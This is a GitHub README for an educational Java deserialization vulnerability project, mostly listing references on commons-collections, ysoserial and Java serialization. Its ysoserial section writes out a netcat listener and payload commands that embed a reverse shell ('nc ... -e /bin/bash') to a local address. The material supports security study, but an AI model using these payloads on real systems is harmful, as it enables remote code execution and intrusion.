Example for Java Deserialization Vulnerability
https://github.com/tedwon/java-deserialization-vulnerability

README

== Java Deserialization Vulnerability
image::https://github.com/tedwon/java-deserialization-vulnerability/workflows/Java%20CI%20with%20Maven/badge.svg[Java CI with Maven]

* OWASP AppSecCali 2015 - Marshalling Pickles
** https://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles
* OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate Java Object Deserialization
** https://www.slideshare.net/frohoff1/deserialize-my-shorts-or-how-i-learned-to-start-worrying-and-hate-java-object-deserialization
* https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
* https://issues.apache.org/jira/browse/COLLECTIONS-580
** https://issues.apache.org/jira/secure/attachment/12771520/COLLECTIONS-580.patch
* commons-collections:3.1
* https://github.com/apache/commons-collections
* https://m.blog.naver.com/skinfosec2000/220887425296
* Remotely Exploitable Java Zero Day Exploits through Deserialization
** https://www.infoq.com/news/2015/11/commons-exploit
* https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf

== ysoserial
* https://github.com/frohoff/ysoserial
* http://frohoff.github.io/appseccali-marshalling-pickles/

[source,options="nowrap"]
----
nc -lvnp 4000

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 "nc 192.168.99.101 4000 -e /bin/bash" | xxd | head -3

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 "nc 192.168.99.101 4000 -e /bin/bash" > reverse.bin
----

== Workaround
* I think we can use Byteman.
** http://byteman.jboss.org/
** https://tedwon.atlassian.net/wiki/spaces/SE/pages/1213364/Byteman
** https://www.slideshare.net/tedwon/12th-jco-jbossrhqbyteman

== Java Serialization
* Java Object Serialization Specification version 6.0
** https://docs.oracle.com/javase/8/docs/platform/serialization/spec/serialTOC.html
* https://www.javaworld.com/article/2072752/the-java-serialization-algorithm-revealed.html
* https://www.mkyong.com/java/how-to-read-and-write-java-object-to-a-file/
* https://tedwon.atlassian.net/wiki/spaces/SE/pages/1212665/Java+Serialization
* JavaSerializationTest.java https://gist.github.com/tedwon/1a1231349919433968bae49827883f94
* https://www.ibm.com/developerworks/library/se-lookahead/
* https://dzone.com/articles/serialization-amp-de-serialization-in-java

== serialVersionUID
* https://docs.oracle.com/javase/8/docs/api/java/io/Serializable.html

== Apache Thrift
* https://www.cvedetails.com/product/38295/Apache-Thrift.html